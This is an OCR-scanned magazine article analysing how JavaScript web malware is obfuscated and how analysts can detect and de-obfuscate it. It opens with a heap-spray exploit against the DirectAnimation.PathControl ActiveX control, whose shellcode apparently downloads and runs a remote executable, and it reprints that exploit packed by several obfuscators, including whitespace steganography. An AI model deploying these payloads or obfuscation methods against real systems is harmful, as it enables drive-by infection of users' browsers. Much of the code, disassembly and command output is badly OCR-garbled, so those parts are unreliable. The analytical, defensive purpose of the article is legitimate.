"%uf 9e2%u6f 68%u00 6e%u6800%u7275%u6d6 
c%uff54%u9516" + 

"%u2ee8%u0 0 0 0%u830 0%u2 0ec%udc8b%u2 0 6 
a%uff53%u0456" + 

"%u04c7%u5c03%u2e61%uc7 65%u034 4%u7 80 
4%u0065%u3300" + 

"%u50c0%u5350%u5057%u5 6ff%u8bl0%u50d 
c%uff53%u0856" + 

"%u5 6ff%u510c%u8b5 6%u3c75%u7 4 8b%u7 82 
e%uf503%u8b56" + 

"%u2 07 6%uf503%uc933%u414 9%u03ad%u33c 
5%u0fdb%ul0be" + 

"%ud63a%u0 87 4%ucbcl%u030d%u4 0da%uf le 
b%ulf3b%ue775" + 

XA %u8b5e%u24 5e%udd03%u8b66%u4b0c%u5e8 
b%u031c%u8bdd" + 

"%u8b0 4%uc503%u5eab%uc35 9%u58e8%uf f f 
f%u8eff%u0e4e" + 

"%uclec%ue57 9%u98b8%u8afe%uef Oe%ueOc 
e%u3660%u2fla" + 

"%u6870%u7474%u3a70%u2f2f%u616d%u77 6 
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c%u7261%u6765" + 

"%u72 75%u2e75%u6f 63%u2f 6d%u6f 63%u6d6 
d%u6e6f%u655f" + 

"%u657 8%u7 42f%u73 65%u2e7 4%u7 661%u00 
69") ; 

bigbk = unescape ( "%uODOD%uODOD" ) ; 
headers ize = 20; 

slackspace = headersize + shellcode. 
length 

while (bigbk . length < slackspace) 
bigbk += bigbk; 

fillbk = bigbk . substring ( 0 , slack- 
space) ; 

bk = bigbk . substring ( 0 , bigbk. 
length-slackspace) ; 

while (bk . length+slackspace < 
0x40000) bk = bk + bk + fillbk; 

memory = new Array (); 

for (i=0; i<800; i++) memory [i] = bk + 
shellcode ; 

var target = new 
ActiveXOb j ect ( "DirectAnimation . Path- 
Control") ; 

target . KeyFrame ( 0x7fffff ff, new 
Array (1) , new Array ( 65535 )) ; 

</ script> 

(Snippet 1) 

Snippet 1 appears obviously malicious to automated 
mechanism as well as humans. 

Packing the above code with Dean Edward's packer 
[Edwards] (online & free) results in the following code: 

eval (function(p,a,c,k,e,d) 
{ e=f unction (c) 

{return (c<a?' 1 :e (parselnt (c/ 
a) ) ) + ( (c=c%a) >35?String. 
f romCharCode (c+29) :c. 
toString (36) ) } ; while (c— ) {if (k[c] ) 
{p=p . replace (new RegExp( A \\ 
b' +e (c) +' \\b' , 'g' ) , k[c] ) } } return p} 
( A a=h P%9"+"%9"+"%9"+"%N%6%D%q%lh%6 
%lf%Y"+"%13%ll%Z%10%la%12%X%6"+"%T% 
S%U%V%k%W%14%15"+"%le%6%lg%lc%lb%17 
%c%16"+"%18%19%R%li%M%y%x%z"+"%A%w% 
C%e%u%r%c%s"+"%e%v%j%t%B%Q%l%j"+"%L 
%l%0%P%K%J%F%E"+"%G%H%I%ld%lt%lV%lU 
%lW"+"%lX%lY%lT%lS%lj%lN%lP%lQ"+"%2 
l%lZ%2 8%2a%2e%2b%2c%2d"+"%2 9%2 3%22% 
2 4%2 5%2 7%2 6%lR"+"%lL%lM%ls%lu%lv%lw 



%lr%lq"+"%k%ll%m%lk%m%lm%ln%lp"+"%l 
o%lx%ly%lH%lG%H") ;2=hP%g%g") ;f=20 
;4=f+a.5 d ( 2 . 5<4 ) 2+=2 ; p=2 . b ( 0 , 4 ) ; 3= 

2 .b (0,2 .5-4) ;d(3.5 + 4<U) 3=3 + 3+p;n=7 
8(); IK (i=0; i<lF; i++) n [i] =3+a; IE o=7 
1A( m 1z.1B") ;o.lC(lD f 7 8(l) f 7 8(10));' 
,62,139,' | | bigbk | bk | slackspace | length 
luOOOO | new | Array |u4 34 3 | shellcode | subs 
tring | uf f 53 | while | u5 6f f | headersize | uO 
DOD | unescape | |u8b5 6 |u72 7 5 |uf503 |u6f 63 
| memory | target | fillbk|ual64 |u50dc|u08 
5 6 |u3c7 5 |u8bl0 |u510c|u5350 |u0 0 65 |u780 
4 |u330 0 |u50c0 | u7 4 8b | u5057 | u5f 0 0 lulObe 
Iu0fdb|ud63a|u0 87 4 | ucbcl | u33c5 | u03ad | 
u2 07 6 |u034 4 | ua3e9 | uc933 | u414 9 | u7 82e | u 
2e61 |u6f 68 | uf 9e2 |u0 0 6e |u68 0 0 |u6d6c|u0 
043 |u8b0c|u0 8 68 | uf 7 8b | u8bad | ue85 9 | ulc 
7 0 luff 54 |u9516 |u045 6 |u2 0 6a|u04c7 |u5c0 
3 | uO 4 6a | udc8b | u2 0ec | u030d| u2ee8 | u4 0 8b 
|u830 0 |u0 030 |uc7 65 Iu4b0c|u2f6d|u2e7 5 | 
u6d6d|u6e6f |u657 8 | u655f | u67 65 | u72 61 |u 
3a70 |u40da|u2f2f |u616d|u77 6c|u742f |u7 

3 65| DirectAnimation | ActiveXOb j ect | Pat 
hControl | KeyFrame | 0x7f f f f f f f | var | 800 | 
u7 6 61 |u2e7 4 |u00 69 | 0x4 0000 | for |u687 0 |u 
7 47 4 |u5e8b| 65535 | u031c | u8bdd | u2 f la | u8 
b6 6 |udd03 | ulf 3b | uf leb | ue7 7 5 | u8b5e |u2 4 
5e |uc503 | |u8b0 4 |u98b8 | ue57 9 | u8af e | uef 
0e|u3660|ue0ce|u5eab|uclec|uc359|ufff 
f | u8ef f I u0e4e | u58e8' . split ( A \' ) ) ) 

(Snippet 2) 

Here the carrier is the "evalO" function and the pay load 
is what's contained inside the eval() function. Snippet 
2 defeats most automated mechanisms, but the 
"eval" appears suspicious to a human eye. The names 
of variables are also kept, and the name "shellcode" 
certainly doesn't look friendly. 

Packing the original Snippet 1 with the [Scriptasy- 
lum] Javascript Encoder (online & free) generates the 
following: 

document . write (unescape ( A %3C%73%63%7 
2%69%7 0%7 4%2 0%6C%61%6E%67%75%61%67%6 
5%3D%22%6A%61%7 6%61%73%63%72%69%7 0% 
7 4%22%3E%66%75%6E%63%7 4%69%6F%6E%2 0 
%64%4 6%2 8%73%2 9%7B%7 6%61%72%2 0%73%31 
%3D%75%6E%65%73%63%61%7 0%65%2 8%73%2 
E%7 3%7 5%62%7 3%7 4%72%2 8%30%2C%7 3%2E% 
6C%65%6E%67%7 4%68%2D%31%2 9%2 9%3B%2 0 
%7 6%61%72%2 0%7 4%3D%27%2 7%3B%66%6F%72% 
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2 8%69%3D%30%3B%69%3C%73%31%2E%6C%65%6 
E%67%7 4%68%3B%6 9%2B%2B%2 9%7 4%2B%3D%53 
%7 4%72%6 9%6E%67%2E%6 6%72%6F%6D%4 3%68% 
61%72%43%6F%64%65%2 8%73%31%2E%63%68%6 
1%72%4 3%6F%64%65%41%7 4%2 8%6 9%2 9%2D%7 3 
%2E%7 3%7 5%62%7 3%7 4%72%2 8%7 3%2E%6C%65% 
6E%67%7 4%68%2D%31%2C%31%2 9%2 9%3B%64%6 
F%63%7 5%6D%65%6E%7 4%2E%7 7%72%6 9%7 4%65 
%2 8%75%6E%65%73%63%61%7 0%65%2 8%7 4%2 9% 

2 9%3B%7D%3C%2F%7 3%63%72%6 9%7 0%7 4%3E' ) 

) ;dF ( A tifmmdpef %2 631%2 64E%2 631vof tdbq 
f%2 63 9%2 633%2 63 6v54 54%2 633%2C%2 633%2 6 

3 6v54 54%2 633%2C%2 633%2 63 6v54 54%2 633%2 
631%2C%2 631%2 61B%2 633%2 63 6vb4f%3A%2 63 
6vllll%2 63 6v6gll%2 63 6vb2 7 5%2 63 6vll41% 
2 63 6vllll%2 63 6v519c%2 63 6v9cld%2 633%2 6 
31%2C%2 61B%2 633%2 63 6v2d81%2 63 6v9cbe%2 
63 6vl97 9%2 63 6vg8 9c%2 63 6vl57b%2 63 6vf 9 6 
%3A%2 63 6vll54%2 63 6vllll%2 633%2 631%2C% 

2 61B%2 633%2 63 6vg%3Af3%2 63 6v7g7 9%2 63 6v 
117f%2 63 6v7 911%2 63 6v838 6%2 63 6v7e7d%2 6 

3 6vgg65%2 63 6v%3A62 7%2 633%2 631%2C%2 61B 
%2 633%2 63 6v3f f 9%2 63 6vllll%2 63 6v9411%2 
63 6v31fd%2 63 6ved9c%2 63 6v317b%2 63 6vgg6 
4%2 63 6vl5 67%2 633%2 631%2C%2 61B%2 633%2 6 
3 6vl5d8%2 63 6v6dl4%2 63 6v3f 72%2 63 6vd8 7 6 
%2 63 6vl4 55%2 63 6v8 915%2 63 6vll7 6%2 63 6v4 
411%2 633%2 631%2C%2 61B%2 633%2 63 6v61dl% 
2 63 6v64 61%2 63 6v6168%2 63 6v67gg%2 63 6v9c 
21%2 63 6v61ed%2 63 6vgg64%2 63 6vl9 67%2 633 
%2 631%2C%2 61B%2 633%2 63 6v67gg%2 63 6v621 
d%2 63 6v9c67%2 63 6v4d8 6%2 63 6v85 9c%2 63 6v- 
8 93f%2 63 6vg614%2 63 6v9c67%2 633%2 631%2C 
%2 61B%2 633%2 63 6v318 7%2 63 6vg614%2 63 6vd 
%3A4 4%2 63 6v52 5%3A%2 63 6vl4be%2 63 6v4 4d6 
%2 63 6vlgec%2 63 6v21cf%2 633%2 631%2C%2 61 
B%2 633%2 63 6ve7 4b%2 63 6vl985%2 63 6vdcd2% 
2 63 6vl41e%2 63 6v51eb%2 63 6vg2fc%2 63 6v2g 
4c%2 63 6vf 8 8 6%2 633%2 631%2C%2 61B%2 633%2 
63 6v9c6f%2 63 6v35 6f%2 63 6veel4%2 63 6v9c7 
7%2 63 6v5cld%2 63 6v6f 9c%2 63 6vl42d%2 63 6v 
9cee%2 633%2 631%2C%2 61B%2 633%2 63 6v9cl5 
%2 63 6vd614%2 63 6v6fbc%2 63 6vd4 6%3A%2 63 6 
v6 9f 9%2 63 6vgggg%2 63 6v9fgg%2 63 6vlf5f%2 
633%2 631%2C%2 61B%2 633%2 63 6vd2fd%2 63 6v 
f 68%3A%2 63 6v%3A9c9%2 63 6v9bgf%2 63 6vfgl 
f%2 63 6vf Idf%2 63 6v4 7 71%2 63 6v3g2b%2 633% 
2 631%2C%2 61B%2 633%2 63 6v7 981%2 63 6v8585 
%2 63 6v4b81%2 63 6v3g3g%2 63 6v72 7e%2 63 6v8 
8 7d%2 63 6v8372%2 63 6v7 8 7 6%2 633%2 631%2C% 



2 61B%2 633%2 63 6v838 6%2 63 6v3f 8 6%2 63 6v7g 
7 4%2 63 6v3g7e%2 63 6v7g7 4%2 63 6v7e7e%2 63 6 
v7f 7g%2 63 6v7 6 6g%2 633%2 631%2C%2 61B%2 63 
3%2 63 6v7 68 9%2 63 6v853g%2 63 6v8 4 7 6%2 63 6v 
3f 85%2 63 6v8 7 72%2 63 6vll7%3A%2 633%2 63%3 
A%2 64C%2 61Bcjhcl%2 631%2 64E%2 631voftdb 
qf%2 63 9%2 633%2 63 6vlElE%2 63 6vlElE%2 633 
%2 63%3A%2 64C%2 61Bifbefstj%7Bf%2 631%2 6 
4E%2 63131%2 64C%2 61Btmbdltqbdf%2 631%2 6 
4E%2 631ifbefstj%7Bf%2 631%2C%2 631tifmm 
dpef /mfohui%2 61Bxijmf %2 631 %2 63 9c jhcl/ 
mfohui%2 631%2 64D%2 631tmbdltqbdf%2 63% 
3A%2 631cjhcl%2 631%2C%2 64E%2 631cjhcl% 
2 64C%2 61Bgjmmcl%2 631%2 64E%2 631cjhcl/ 
tvctusjoh%2 63 91%2 63D%2 631tmbdltqbdf % 
2 63%3A%2 64C%2 61Bcl%2 631%2 64E%2 631cj 
hcl/tvctusjoh%2 63 91%2 63D%2 631cjhcl/ 
mfohui . tmbdltqbdf %2 63%3A%2 64C%2 61Bxi j 
mf %2 63 9cl/mfohui%2Ctmbdltqbdf %2 631%2 6 
4D%2 6311y51111%2 63%3A%2 631cl%2 631%2 64 
E%2 631cl%2 631%2C%2 631cl%2 631%2C%2 631g 
jmmcl%2 64C%2 61Bnfnpsz%2 631%2 64E%2 631o 
fx%2 631Bssbz%2 63 9%2 63%3A%2 64C%2 61Bgps 
%2 631%2 63 9j%2 64El%2 64Cj%2 64D911%2 64Cj 
%2C%2C%2 63%3A%2 631nfnpsz%2 6 6Cj%2 6 6E%2 
631%2 64E%2 631cl%2 631%2C%2 631tifmmdpef 
%2 64C%2 61Bwbs%2 631ubshfu%2 631%2 64E%2 6 
31ofx%2 631BdujwfYPckfdu%2 63 9%2 633Ejsf 
duBojnbujpo/QbuiDpouspm%2 633%2 63%3A%2 
64C%2 61Bubshfu/Lf zGsbnf %2 63 91y8gggggg 
g%2 63D%2 631ofx%2 631Bssbz%2 63 92%2 63%3A 
%2 63D%2 631ofx%2 631Bssbz%2 63 97 6 64 6%2 63 
%3A%263%3A%264C%261B1' ) 

(Snippet 3) 

Here the carrier is "document.writeO" and the pay load 
is what's inside it. Most features of the original Snippet 
1 have been eliminated, and it is now difficult for 
automated mechanisms to identify Snippet 2 as being 
malicious. They can identify that Snippet 2 has been 
obfuscated, but remember these online obfuscators are 
very popular. Quoted from Scriptasylum's description of 
their packer: 'This script will encode javascript to make it 
more difficult for people to read and/or steal. Just follow 
the directions below." Considering all obfuscated code as 
malicious will result in a high false positive rate. 

But in process of incident response analysis, a hu- 
man expert will easily spot this seemingly malicious 
script, and can reverse the script back to its original 
form by using javascript de-obfuscators designed to 
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analyze malicious scripts. A very popular tool is [Malz- 
illa], which does a decent job. 

Unfortunately, there are obfuscation algorithms to- 
day designed to defeat popular de-obfuscation tools 
such as [Malzilla]. A large collection of such online 
obfuscation tools can be found at sites such as http:// 
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F/gt/re 2: cha88.cn hosts many obfuscation tools online. 
Second from the left is "obfuscation tool by foreigner/' which is 
Dean Edwards packer. 
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cha88.cn. Dean Edward's packer [Edward] is also 
included and named "packer by foreigner." 

Online obfuscation tools are now a standard function- 
ality of most webshells. Below is a screenshot of Crab's 
webshell, which includes a link to cha88.cn, as well as 
batch (malicious) javascript insertion functionalities: 
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Figure 3: One ofcha88's script / ess/ html encoder / decoder 
user interfaces 
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Figure 4: Crab's webshell, which includes a link to cha88.cn, as well as batch (malicious) javascript insertion functionalities. 
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Using one of its online packers [Cha88.cn-1 ] against Snippet 1 generate the following code: 
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The codes are laid out clockwise from 
top-left to bottom-right. 



(Snippet 4) e = 0; 

Due to its special design, [Malzilla] will fail to reverse h = this; 

the above code. Here the pay load is the KeyStr for (i in h) 

variable, and the carrier "t=eval("mydata(String. { 

fromCharCode("+tV)yy,document.write(t)^ if (i. length == 8) 

looks familiar. Yes, this algorithm has been widely used { 

by malware authors and in mass SQL injection attacks i f ( i . char CodeAt ( 0 ) == 10 0) 

ongoing since Jan of this year. So although algorithms { 

like the above defeats most automated detection i f ( i . char CodeAt ( 7 ) == 116) 

mechanisms, Snippet 3 still seems very suspicious to a { 

human eye. break; 

In DEFCON 1 S^Kolisar]) presented the whitespaces } 

obfuscation (WSO) method, which will defeat } 

both automated and human inspection. Using it } 

(hosted online at http://malwareguru.com/kolisar/ } 

WhiteSpaceEncode.html) to encode Snippet 3 gener- for (j in h[i]) 

ates the following code: { 

<script id='p'> if (j. length == 5) 

d = 0; { 
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if (j .charCodeAt (0) == 119) 
{ 

if (j .charCodeAt (1) == 114) 
{ 

break; 

} 

} 

} 

} 

for (k in h[i] ) 
{ 

if (k. length == 14) 
{ 

if (k. charCodeAt (0) == 103) 
{ 

if (k. charCodeAt (3) == 69) 
{ 

break; 



} 

r=h[i] [k] Pp') ; 
for (1 in r) 
{ 

if (1 . length == 9) 
{ 

if (1. charCodeAt (0) == 105) 
{ 

if (1. charCodeAt (5) == 72) 
{ 

break; 

} 

} 

} 

} 

a=r[l] ; 

b=a. split ( A \n' ) ; 
o = 

for(c=3; c < (e+3) ; C++) 
{ 

s=b [c] ; 

for(f=0; f < d; f++) 
{ 

y = ((s. length - (8*d)) + {f* 
v = 0; 

for (x = 0; x < 8; x++) 



v++; 
} 

if(x != 7) 
{ 

v = v « 1; 

} 

} 

o += String . fromCharCode (v) ; 

} 

} 

h[i] [j] (o) ; 

</ script> 

(Snippet 5) 

The WSO attack is unique in two vectors. First, it defeats 
manual human inspection because it does not contain 
"eval()"or"document.write()"in any part of the code. 
Second, the payload is encoded using spaces (repre- 
senting bit-wise 0) and tabs (bit-wise 1) and appended 
after each line of code of the carrier. This approach is 
unique because no matter what payload is embedded, 
the resulting payload is always encoded using spaces 
and tabs and appended to the end of line of the carrier 
code. Therefore, the payload is not disclosed visually 
under manual inspection, because spaces and tabs 
appear "transparent" under most text editors / view- 
ers. This again, defeats manual investigation. A careful 
inspector can "select" the javascript, causing the spaces 
and tabs to be highlighted and therefore reflect a visual 
representation of the payload: 
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Kolisar's WSO is a new threat because it isn't just ob- 
fuscation, it's steganography ~ quoted from Wikipe- 
dia: "Steganography is the art and science of writing 
hidden messages in such a way that no one alllpart 
from the sender and intended recipient even realizes 
there is a hidden message." However, up to now, we 
have only researched obfuscation / steganography 
algorithms where the payload and the carrier reside in 
the same file and exist in the same format-text. With 
today's ajax support by browsers, javascripts can get a 
lot more nasty. 

We summarize this section by listing reasons that 
make detection of Web-based malware difficult: 

1 . Speed considerations and strict time constraints 
have forced gateway devices and anti-virus solutions 
to have always relied on signature-based pattern 
matching technologies. Such technologies have dif- 
ficulties detecting Web-based malware because: 

A. The nature of interpreted script languages, where 
generation of executable code at runtime is a norm, 
causes pattern-based approaches to fail. 

B. Time constraints for gateway devices and anti- 
virus solutions prevent them from adopting behavior- 
based technologies, even if they have them. 

2. Because script languages only exist in source 
code format (no binary executables), obfuscation is 
a widely adopted measure for intellectual property 
protection. Compression is also widely adopted for 
optimization purposes. Therefore unlike for Windows, 
Web-based malware detection mechanisms cannot 
assume that all obfuscated code is malicious. 

Detection Techniques 

1 . The Assembly Way - Tracing JavaScript 
Obfuscation Parameters 

It's always a good approach to get to the source of 
the objects to trace the functionality. The JavaScript 
which has been obfuscated for any specific purpose 
should be de-obfuscated prior to execution. This 
method has been followed in our analysis extensively. 
In order to understand the working behavior, certain 
facts need to be considered: 

1 . All the HTML calls in browser i.e. rendering vari- 
ous objects require a specific library that exports 
various functions for the execution. For Example - 
Internet Explorer utilizes MSHTML.DLL primarily for 
rendering content in the browser. That's true. It means 
functions that are used for rendering and execution 
are located inside it. It is always better to be acquaint- 



ed with the base libraries used for rendering DOM 
objects and other HTML tags. 

2. Understanding the holistic functionality of 
the obfuscated script. If an analyst is able to judge 
certain calls such DOM object execution, IFRAMES 
etc, it indirectly helps to trace those functions in 
the assembly when a reverse engineering process is 
carried on. 

3. Most of the major malware uses IFRAMES or DOM 
functions such as Document.write etc for collabora- 
tive use with obfuscated scripts. 

The base of this technique is simple and based on 
the interpreter's functionality to deobfuscate the 
script for execution in the context of the browser. The 
technique is browser specific but with a specific set of 
changes in different platforms this technique works 
efficiently. For this technique, IE has been chosen to 
perform analysis which in turn is the most exploitable 
browser in the wild. 

Example Working 

A possible obfuscated script is detected as 
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During the execution state, it is discovered that 
the script is making calls to DOM functions such as 
document.write. The main analysis point is to hook 
the required function to trace the obfuscated code 
in real time. On disassembling the MSHTML.DLL and 
tracing the document.write method the traced code 
is presented below as: 
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775E52JIA 


; Attributes: 


bp-based frarae 








?75E52Jifl 


; int stdcall CDocunent urite(int .SAFEAHRAV *psa> 




?wlteeCDocuiwni:@PQftf:.iPfl lit .^5 flFFrtRRfiveoiz prot near 


?75E52iifl 




; CODE KBEF: 


77FF5?Jifl 








pu 


- uHHiRMmHU ptr -am* 


775F52J|fl 


Mir_18 


- duord ptr- -I8n 






- duard ptr -1flh 


77FF52J*fl 


ojr_1 e 


- d*JOrd ptr- -10ti 


/7 5L5 2i|fl 


uar_C 


- duard ptr -Atti 


775F52J*fi 


rg Indices 


- dword ptr -8 


77 5E5ai|fl 


uar 


- duard ptr -h 


775E52J*fl 




- dworil ptr 8 j 


77 5E.524A 


psa 


- dward ptr OCti 



The required DOM function is calling the SAFEARRAY 
*psa data structure and passing it as an argument. 
Looking at the SAFEARRAY structure information. 

The SAFEARRAY Structure 

When converted to C++ and trimmed of excess 
typedefs and conditionals, the SAFEARRAY structure 
looks something like this: 

struct SAFEARRAY { 
WORD cDims; 
WORD f Features; 
DWORD cbElements; 
DWORD cLocks; 
void * pvData; 

SAFEARRAYBOUND rgsabound [ 1 ] ; 

}; 

•The cDims field contains the number of dimensions 
of the array. 

• The fFeatures field is a bitfield indicating attributes 
of a particular array. (More on that later.) 

• The cbElements field defines the size of each ele- 
ment in the array. 

• The cLocks field is a reference count that indicates 
how many times the array has been locked. When 
there is no lock, you're not supposed to access the 
array data, which is located in pvData. It points to 
the actual data. 

• The last field is an array of boundary structures. By 
default, there's only one of these, but if you define 
multiple dimensions, the appropriate system func- 
tion will reallocate the array to give you as many 
array elements as you need. The dimension array is 
the last member of the array so that it can expand. 
A SAFEARRAYBOUND structure looks like this: 

struct SAFEARRAYBOUND { 
DWORD cElements; 
LONG lLbound; 

}; 



The structure contains a *pvData which is pointing 
to another structure which is presented below 

typedef struct UNICODE_STRING { 

USHORT Length; 

USHORT MaximumLength; 

PWSTR Buffer; 

} 

Length: Specifies the length, in bytes, of the string 
pointed to by the Buffer member, not including the 
terminating NULL character, if any. 

MaximumLength: Specifies the total size, in bytes, of 
memory allocated for Buffer. Up to MaximumLength 
bytes may be written into the buffer without tram- 
pling memory. 

Buffer: Pointer to a wide-character string. Note that 
the strings returned by the various functions might 
not be null terminated. 

The PWSTR buffer used in the above assembly is 
the pointer to the de-obfuscated script. So using this 
technique it is easy to monitor the buffer in real time 
to trace the working of JavaScript rendered in the 
browser itself. This technique does not depend on the 
complexity of obfuscation but rather on the inherited 
tracing in a real environment. 

2. PERL based Holistic Obfuscated Code Detection 
PERL is another powerful tool for analyzing and 
decoding code from perspective of malware and 
security analysis. PERL in itself is very robust in per- 
forming operations on regular expressions and string 
conversion. This functionality comes handy in analyz- 
ing obfuscated code to some level. 
PERL URI Escape Module 

This provides functions to escape and unescape URI 
strings as defined by RFC 2396 (and updated by RFC 
2732). A URI consists of a restricted set of characters, 
denoted as uric in RFC 2396. The restricted set of 
characters consists of digits, letters, and a few graphic 
symbols chosen from those common to most of the 
character encodings and input facilities available to 
Internet users: 

More: http://search.cpan.org/-gaas/URI-h5 1/URI/ 
Escape.pm 

Try out with different options. 

Primarily we use this technique to detect and trace 
the target system which is encoded directly. The 
only solution is to unescape the code to detect the 
malware domain. Our analysis used this part tremen- 
dously. With suitable example this will be proved. 
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Example: Let's apply this effective check to perform 
the trick. 

Check 1 : The obfuscated code 



%3C% 68%74% 6D% 6C%3E%0A%3C% 69%66%72%61% 6D% 6 

5%20%73%72%63%3D%22%70%61%6C%73%75%2E%70%68% 

70%22%20%6E%61%6D%65%3D%22%66%61%6B%65%22%20 

%20%3E%3C%2F%69%66%72%61%6D%65%3E%20 

%0A%3C%73%63%72%69%70%74%20%74%79%70%65 

%3D%22%74%65%78%74%2F%6A%61%76%61%73%63 

%72%69%70%74%22%3E%0A%66%75%6E%63%74%69 

%6F%6E%20%6D%79%73%74%79%6C%65%28%29%20 

%7B%0A%20%20%20%20%69%66%20%28%66%61%6B%65 

%2E%64%6F%63%75%6D%65%6E%74%2E%73%74%79%6 

C%65%53%68%65%65%74%73%2E%6C%65%6E%67%74% 

68%20%3D%3D%20%31%20%29%20%0A%09%7B%0A%20 

%20%20%20%20%20%66%20%3D%20%64%6F%63%7 

5%6D% 65%6E% 74 %2E% 66% 6F% 72%6D% 73%5B%22 

%62%61%73%69%63%73%74%79%6C%65%22%5D%2 

E%65%6C%65%6D%65%6E%74%73%3B%0A%20%20%20%20 

%20%20%66%6F%72%20%28%6A%20%3D%20%30%3B%20 

%6A%20%3C%20%66%2E%6C%65%6E%67%74%68%3B%20 

%6A%2B%2B%29%20%0A%09%20%20%09%7B%0A%20 

%20%20%20%20%20%20%09%69%66%20 

%28%66%5B%6A%5D%2E%6E%61%6D%65%20%3D%3D%20 

%27%66%73%6D%61%69%6E%27%29%3B%0A%20%20%20 

%20%20%20%09%7D%20%20%0A%20%20%20%20%20%20 

%7D%0A%0A%20%7D%0A%6D%79%73%74%79%6C%65%28%2 

9%3B%0A%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F% 

68%74%6D%6C%3E%0 



Check 2: Double Layer Encoding - Layered 
Obfuscation 



The very effective technique is unescaping the 
code. Let's trigger it through PERL. The code is put 
into a file called temp.txt. 



ML* I : : f r . caji-n pnr ^t_-uri_un*"Lrapp<'J_3 " 



•ci fr*m*- -. r i |j.k *!-.■■. php" n.w-"Uj''' a- -c/ "i fr^> 

<scr i gt type- i *>.C / H av'^if ipt " > 

funil inrt mv^ y1*0 I 

if £ Fake . dotMenfc . ttyle-Sheets . 1 etipth u 1 > 
f ■ docuM-nt . fw«s ["baiic-itvlt" J-*T«*nrt; 



i./hT*l> 



Aygilr1w*/c 



The decode code looks like to be a server side infec- 
tious PHP exploit. This is a simple example. The code 
can be encoded in a dual manner. If one finds that on 
escaping for a single iteration lowers the length of 
the code then keep on iterating the code to get to the 
source. Let's analyze. 
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, : '.. ?7%?3'!62S 1 *bJ?%3i ,rt s.7'i-- W!:. * ?--^v '{ ■'■'i.M - ■ ? W,3ZW5V>3B%3BW5%37%34%Z5m7*34 
W25^37^^mJ5%3J^l%25WJ21M6%75^2%^6W25%3iS%36%25W36W«%25%37 , :i. " 
25^37^5^25%J7WJ3%JS*i36q4399&25143S%33%25- J.-"::-? f '-/.? , i;.36?SJJ!425 , «3«MB»25»32^^.S , !s.7 
J.?'-:;.2ii r-.y.'/s..if. % is '.\/.v:;.js % jos,/.^ Oi.2,V.J^A.^; 5sJ JO ^JJ<Mi«WJ?A36«Jj!»h2S«J6*i. i := <.\s.; 
% Jfi««9fcJJ*U7«b Jrf^SWJSifeJS^i .'/!:..if. vl J.'/\.y'5*.J7% J<*tt2596J2*i.?£ ( -!;./'.! : ■ ■ ■ .-• .<.-Si*J4fcJJ?t 

^:-' v-;: ■:/■■: \-. n-.-<.i<m?<i»i. i(,°A±<i>*,/-<. i f^:v™i.«fti«, J ^:./v:vi?«s. 
s Si-M."..^', :-. ,.VN.fl?9fc7s%-dfim, «-:v».s's. *7v«- .^-vs. m-s^--;. w,«;i.¥^^;.i?»«!. ««i.^*<7 

•• - ' " ■. ' " ir-::.;^-<-;.z?%3J%46%25%3™?3W5^. '- ■ ■'!■■■ ■!■::. 7': v =- w .?st,- 
-T in-.. Vi-...^v W!:. ?v - { ?.«;. ?;v ; I'!:. v f . v. ?fVJ 5» H SfrHW 25"- ^ V 3 - 7 v,. 7 ; v .-3 7" i 7'.. ■•: 
- •• i3K46%2SK36%4-: -W.- v:, •• -.' --J?%25»J7»J3«J5%J6^3 



'■ ■■■ '■ *v.-. ■.. :-..^A. i a < ■ -\. ,.;-s : .; *«»./'. ■-. ,.;-s : * • vfl < ■■;»■.. t r-\.j tv\.a ■-.j h 

?,":. W\W W...J "■■ .?<■-,■ , i v.. I--.- 7-" V ' v 7 v. JJ%33%25ft. J-S'V. ^ • -S.7 ?A..?5 V 1 7 

. 'i •, ■ " •• ■ :6%3S%251*37%32W25%35% 1 S ; - 7 Ji-W 25%36%J] %2f% 17^33 %2SWJ7» 



J-\i/.'/!;. •: . • :i 'i 25%3i »4tiJ5»iLM<K4J 

" i -v; : - J ?•••.. i.:-v. ^^.72^32%?5^J2^30W25^J6^3SW25^3^%J5"--.^v 

3fl»J9%«'!w.;*v:. 3- ? •- ^.'! , ii.36%ja%25WiJ7WJ4^.? - 3 : - :" ■■ 37^.J>':;..-J : - J3*.:<£> : -- ^S^j 

1<&4S 



On running the same set of commands it has been 
detected that the code is lowered to half. Let; have a 
look. 




This gives an indication that first iteration to unes- 
cape code works fine. Let's try for the second iteration. 



Il Frt t«p.-.b.t | pcvl -tMflJ: Scrape -« l_^«-i_un#f^ »♦((_]■ 

SWVI » , iaW* , 5L>S. r n:i3k.'Lft^. \t i > shSMi V-VJ%MMi *.":>r. 'MfMI % ' rWf*/ WWk\ 



At last the test is successful and it shows that a 
wordpress exploit is obfuscated in it. So the code is 
decoded after second iteration. 

As mentioned previously about using PERL with 
regular expression is and advanced analysis part to 
replace the content of file or decoding the file byte by 
byte by specifying the character length. 
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Some of generic PERL command line standard com- 
mands. Try and search for the functionality. 

perl -MMIME : : Base64 -ne 'print 

decode_base64 ($_) 1 <file 

perl -MMIME: :Base64 -0777 -ne 'print 

encode_base64 ($_) 1 <file 

perl -pe ' s/% ( [ 0-9A-Z ] ) { 2 } / 

chr (hex ( $1 ) ) /ieg; 1 

perl -Mencoding=utf 16, STDOUT, utf 8 -n 
-e print < in > out 

perl -Mencoding=utf 16, STDOUT, utf 8 -p 
-e 1 < in > out 

perl -C -Mutf8 -e"print qq(\x{83})" 
>d. txt 

This technique is very helpful. Perl is a good sani- 
tized working tool and every analyst should give a try. 

3. Obfuscated Hybrid Code Detection 

The obfuscation does not end only with escaping and 
generic encoders. Obfuscated is also hybrid nowa- 
days. There can be a scenario in which two scripting 
languages are used together. It can be a use o single 
scripting language with other custom encoders. 
The analysis has to be performed in such a way to 
scrutinize the dependency factor between scripting 
languages and custom encoders. Let's perform one 
analysis on the below mentioned script. 



The above stated obfuscated code is build from two 
different modules. The presence of "%" character proj- 



ects that there is a possibility of escaping the code. 
The second function is not look like to be an escape 
code. Let's apply the technique discussed previously 
in PERL to see what we have decoded. 




There decode part is 



document . write (unescape ( ^script 
language=" j avascript"> function 
exploit_hell (s) {var sl=unescape ( s . 
substr (0, s . length-1) ) ; var 
t=' ' ; for (i=0; i<sl . length; i++) 
t+=String. f romCharCode (si . 
charCodeAt (i) -s . substr (s . length- 
1,1) ) ; document .write (unescape ( t ) ) ; } </ 
script>' ) ) ; 

The main point is to find the code inside exploit_hell 
function. But this code seems to have been packed with 
some custom encoder. In order to look into part some 
automated deobfuscate code analyzer has to be used. 

1 . Spider Monkey: SpiderMonkey is Gecko's 
JavaScript engine written in C. It is used in various 
Mozilla products, including Firefox, and is available 
under MPL/GPL/LGPL tri-license 

